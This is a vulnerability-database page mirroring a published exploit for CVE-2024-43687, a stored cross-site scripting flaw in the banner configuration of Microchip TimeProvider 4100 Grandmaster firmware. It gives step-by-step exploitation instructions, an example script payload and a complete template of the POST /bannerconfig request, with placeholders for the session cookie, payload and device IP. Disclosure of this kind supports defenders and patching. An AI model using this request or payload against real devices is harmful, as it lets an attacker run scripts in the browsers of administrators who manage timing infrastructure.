Vulners
Lucene search
๐ Microchip TimeProvider 4100 Grandmaster 2.4.6 Cross Site Scripting
๐๏ธย 04 Apr 2025ย 00:00:00Reported byย Armando Huesca Prida, Vito Pistillo, Marco Negro, Antonio Carriero, Massimiliano Brolli, Manuel Leone, Davide RennaTypeย 
ย packetstorm๐ย packetstorm.news๐ย 240ย Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2024-43687 | 4 Oct 202422:43 | โ | circl |
 | Microchip TimeProvider 4100 ๅฎๅ จๆผๆด | 4 Oct 202400:00 | โ | cnnvd |
 | CVE-2024-43687 | 4 Oct 202419:41 | โ | cve |
 | CVE-2024-43687 XSS vulnerability in bannerconfig endpoint in TimeProvider 4100 | 4 Oct 202419:41 | โ | cvelist |
 | Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) | 4 Apr 202500:00 | โ | exploitdb |
 | EUVD-2024-40423 | 3 Oct 202520:07 | โ | euvd |
 | CVE-2024-43687 | 4 Oct 202420:15 | โ | nvd |
 | PT-2024-30614 ยท Microchip ยท Timeprovider 4100 | 4 Oct 202400:00 | โ | ptsecurity |
 | CVE-2024-43687 | 23 May 202510:39 | โ | redhatcve |
 | CVE-2024-43687 XSS vulnerability in bannerconfig endpoint in TimeProvider 4100 | 4 Oct 202419:41 | โ | vulnrichment |
10
# Exploit Title: Microchip TimeProvider 4100 Grandmaster (banner) - Stored XSS
# Exploit Author: Armando Huesca Prida
# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
# Date of Disclosure: 27/06/2024
# Date of CVE Publication: 4/10/2024
# Exploit Publication: 10/10/2024
# Vendor Homepage: https://www.microchip.com/
# Version: Firmware release 1.0 through 2.4.7
# Tested on: Firmware release 2.3.12
# CVE: CVE-2024-43687
# External References:
# URL: https://www.cve.org/cverecord?id=CVE-2024-43687
# URL: https://www.0xhuesca.com/2024/10/cve-2024-43687.html
# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner
# URL: https://www.gruppotim.it/it/footer/red-team.html
# Vulnerability Description:
The TimeProvider 4100 grandmaster firmware has a stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. A threat actor that exploits this vulnerability is able to execute arbitrary scripts in any user context.
# Exploitation Steps:
1- Log in to the device's web management interface.
2- Open the banner configuration panel.
3- Select the "custom banner" feature.
4- Insert the malicious JavaScript payload.
5- Apply and save the system configuration containing the custom banner.
6- Victims who connect to the device's web management interface will execute the malicious payload in their browser.
# Example of malicious JavaScript payload:
<img src=a onerror=alert(1)>
# Proof of Concept - PoC:
By manually modifying the following request, it is possible to create a new custom device banner containing a malicious JavaScript payload, resulting in a stored XSS vulnerability. The list of values โโthat must be updated in the exploit HTTP request is given below:
- [session cookie]
- [malicious JavaScript payload]
- [device IP]
# Exploit - HTTP Request:
POST /bannerconfig HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502
Content-Length: 673
Origin: https://[device IP]
Referer: https://[device IP]/bannerconfig
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: keep-alive
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="user_level"
1
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="bannerradio"
CUSTOMIZED
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="txtcustom"
[malicious JavaScript payload]
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="action"
applybanner
-----------------------------9680247575877256312575038502--
# EndData
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Apr 2025 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
CVSS 47.7
EPSS0.02577
SSVC